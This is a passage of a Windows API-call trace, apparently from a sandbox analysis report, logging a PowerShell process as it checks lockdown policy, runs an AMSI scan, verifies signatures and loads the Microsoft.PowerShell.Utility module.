dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0158.416] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508d738 | out: phkResult=0xafa508d738*=0x6a4) returned 0x0 [0158.416] RegQueryValueExW (in: hKey=0x6a4, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0xafa508d788, lpData=0x0, lpcbData=0xafa508d780*=0x0 | out: lpType=0xafa508d788*=0x0, lpData=0x0, lpcbData=0xafa508d780*=0x0) returned 0x2 [0158.416] RegCloseKey (hKey=0x6a4) returned 0x0 [0158.429] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0xafa508d120, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0158.429] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508d600) returned 1 [0158.429] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6a4 [0158.429] GetFileType (hFile=0x6a4) returned 0x1 [0158.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508d570) returned 1 [0158.430] GetFileType (hFile=0x6a4) returned 0x1 [0158.430] SetFilePointer (in: hFile=0x6a4, lDistanceToMove=0, lpDistanceToMoveHigh=0xafa508d5b8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xafa508d5b8*=0) returned 0x0 [0158.430] ReadFile (in: hFile=0x6a4, lpBuffer=0x238003c7f10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508d638, lpOverlapped=0x0 | out: lpBuffer=0x238003c7f10*, lpNumberOfBytesRead=0xafa508d638*=0x950, lpOverlapped=0x0) returned 1 [0158.433] SetFilePointer (in: hFile=0x6a4, lDistanceToMove=0, lpDistanceToMoveHigh=0xafa508d5b8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xafa508d5b8*=0) returned 0x950 [0158.433] ReadFile (in: hFile=0x6a4, lpBuffer=0x238003c73c8, nNumberOfBytesToRead=0x2b0, lpNumberOfBytesRead=0xafa508d638, lpOverlapped=0x0 | out: lpBuffer=0x238003c73c8*, lpNumberOfBytesRead=0xafa508d638*=0x0, lpOverlapped=0x0) returned 1 [0158.433] SetFilePointer (in: hFile=0x6a4, lDistanceToMove=0, lpDistanceToMoveHigh=0xafa508d5b8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xafa508d5b8*=0) returned 0x950 [0158.433] ReadFile (in: hFile=0x6a4, lpBuffer=0x238003c7f10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508d638, lpOverlapped=0x0 | out: lpBuffer=0x238003c7f10*, lpNumberOfBytesRead=0xafa508d638*=0x0, lpOverlapped=0x0) returned 1 [0158.433] CoTaskMemAlloc (cb=0x20c) returned 0x2386d6e6390 [0158.433] GetSystemDirectoryW (in: lpBuffer=0x2386d6e6390, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.433] CoTaskMemFree (pv=0x2386d6e6390) [0158.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0xafa508d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0158.433] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508d550) returned 1 [0158.433] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0xafa508d630 | out: lpFileInformation=0xafa508d630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0158.434] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508d510) returned 1 [0158.434] WldpGetLockdownPolicy () returned 0x0 [0158.434] GetSystemInfo (in: lpSystemInfo=0xafa508d690 | out: lpSystemInfo=0xafa508d690*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0158.434] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508d598 | out: phkResult=0xafa508d598*=0x6bc) returned 0x0 [0158.434] RegQueryValueExW (in: hKey=0x6bc, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0xafa508d5e8, lpData=0x0, lpcbData=0xafa508d5e0*=0x0 | out: lpType=0xafa508d5e8*=0x0, lpData=0x0, lpcbData=0xafa508d5e0*=0x0) returned 0x2 [0158.434] RegCloseKey (hKey=0x6bc) returned 0x0 [0158.435] CloseHandle (hObject=0x6a4) returned 1 [0158.437] CoCreateGuid (in: pguid=0xafa508d748 | out: pguid=0xafa508d748*(Data1=0xcd40895e, Data2=0x1caa, Data3=0x4fb8, Data4=([0]=0xa0, [1]=0x5b, [2]=0x7d, [3]=0x4a, [4]=0xa3, [5]=0xec, [6]=0xbd, [7]=0xa5))) returned 0x0 [0158.455] AmsiOpenSession () returned 0x0 [0158.455] AmsiScanString () returned 0x80070015 [0158.532] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0xafa508ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0158.532] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508d110) returned 1 [0158.532] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508d1f0 | out: lpFileInformation=0xafa508d1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0158.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508d0d0) returned 1 [0158.533] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0xafa508cc70, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0158.533] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0xafa508cba0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0158.533] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508cff0) returned 1 [0158.533] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508d0d0 | out: lpFileInformation=0xafa508d0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0158.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508cfb0) returned 1 [0158.533] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0xafa508caa0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0158.533] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508cf80) returned 1 [0158.533] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6c8 [0158.534] GetFileType (hFile=0x6c8) returned 0x1 [0158.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508cef0) returned 1 [0158.534] GetFileType (hFile=0x6c8) returned 0x1 [0158.534] WTGetSignatureInfo () returned 0x0 [0158.608] CertDuplicateCertificateContext (pCertContext=0x2386d593bc0) returned 0x2386d593bc0 [0158.608] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508d018 | out: phkResult=0xafa508d018*=0x6d8) returned 0x0 [0158.609] RegQueryValueExW (in: hKey=0x6d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508d068, lpData=0x0, lpcbData=0xafa508d060*=0x0 | out: lpType=0xafa508d068*=0x1, lpData=0x0, lpcbData=0xafa508d060*=0x56) returned 0x0 [0158.609] RegQueryValueExW (in: hKey=0x6d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508d068, lpData=0x238003f36d0, lpcbData=0xafa508d060*=0x56 | out: lpType=0xafa508d068*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xafa508d060*=0x56) returned 0x0 [0158.609] RegCloseKey (hKey=0x6d8) returned 0x0 [0158.609] CoTaskMemAlloc (cb=0x10) returned 0x2386d61c680 [0158.609] CoTaskMemAlloc (cb=0x50) returned 0x2386d3b51f0 [0158.609] WinVerifyTrust () returned 0x0 [0158.610] CoTaskMemFree (pv=0x2386d3b51f0) [0158.610] CoTaskMemFree (pv=0x2386d61c680) [0158.610] CertFreeCertificateContext (pCertContext=0x2386d593bc0) returned 1 [0158.611] CloseHandle (hObject=0x6c8) returned 1 [0158.627] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en-US\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en-us\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0158.628] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0158.644] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0xafa508c310, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0158.644] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x105, lpBuffer=0xafa508c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0158.723] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", nBufferLength=0x105, lpBuffer=0xafa508c310, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x63 [0158.723] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508c760) returned 1 [0158.724] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0xafa508c840 | out: lpFileInformation=0xafa508c840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0158.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508c720) returned 1 [0158.726] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0158.726] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0158.726] CoTaskMemAlloc (cb=0x20e) returned 0x2386b586890 [0158.726] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2386b586890, nSize=0x105 | out: lpBuffer="") returned 0x97 [0158.726] CoTaskMemFree (pv=0x2386b586890) [0158.726] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xafa508c0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0158.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508c520) returned 1 [0158.727] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xafa508c600 | out: lpFileInformation=0xafa508c600*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0158.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508c4e0) returned 1 [0158.730] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0158.746] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xafa508c0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0158.746] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508c520) returned 1 [0158.746] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xafa508c600 | out: lpFileInformation=0xafa508c600*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0158.746] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508c4e0) returned 1 [0158.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0xafa508c0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0158.746] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508c520) returned 1 [0158.746] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0xafa508c600 | out: lpFileInformation=0xafa508c600*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0158.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508c4e0) returned 1 [0158.749] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x105, lpBuffer=0xafa508bf30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x50 [0158.749] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508c380) returned 1 [0158.749] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0xafa508c460 | out: lpFileInformation=0xafa508c460*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0158.749] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508c340) returned 1 [0158.753] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0158.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x105, lpBuffer=0xafa508bf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x58 [0158.753] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508c380) returned 1 [0158.753] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0xafa508c460 | out: lpFileInformation=0xafa508c460*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0158.753] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508c340) returned 1 [0158.756] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0159.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xafa508be80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0159.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xafa508bd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0159.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xafa508bb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0159.977] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1")) returned 0x20 [0159.977] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xafa508bcd0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0159.977] CoTaskMemAlloc (cb=0x20c) returned 0x2386d7060e0 [0159.977] GetSystemDirectoryW (in: lpBuffer=0x2386d7060e0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0159.977] CoTaskMemFree (pv=0x2386d7060e0) [0159.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0xafa508bba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0159.977] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508bff0) returned 1 [0159.977] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0xafa508c0d0 | out: lpFileInformation=0xafa508c0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0159.978] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508bfb0) returned 1 [0159.978] WldpGetLockdownPolicy () returned 0x0 [0159.978] GetSystemInfo (in: lpSystemInfo=0xafa508c130 | out: lpSystemInfo=0xafa508c130*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0159.978] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508c038 | out: phkResult=0xafa508c038*=0x6c8) returned 0x0 [0159.979] RegQueryValueExW (in: hKey=0x6c8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0xafa508c088, lpData=0x0, lpcbData=0xafa508c080*=0x0 | out: lpType=0xafa508c088*=0x0, lpData=0x0, lpcbData=0xafa508c080*=0x0) returned 0x2 [0159.979] RegCloseKey (hKey=0x6c8) returned 0x0 [0159.979] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xafa508bb70, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0159.979] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508c010) returned 1 [0159.979] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x238004d19f0 | out: lpFileInformation=0x238004d19f0*(dwFileAttributes=0x20, 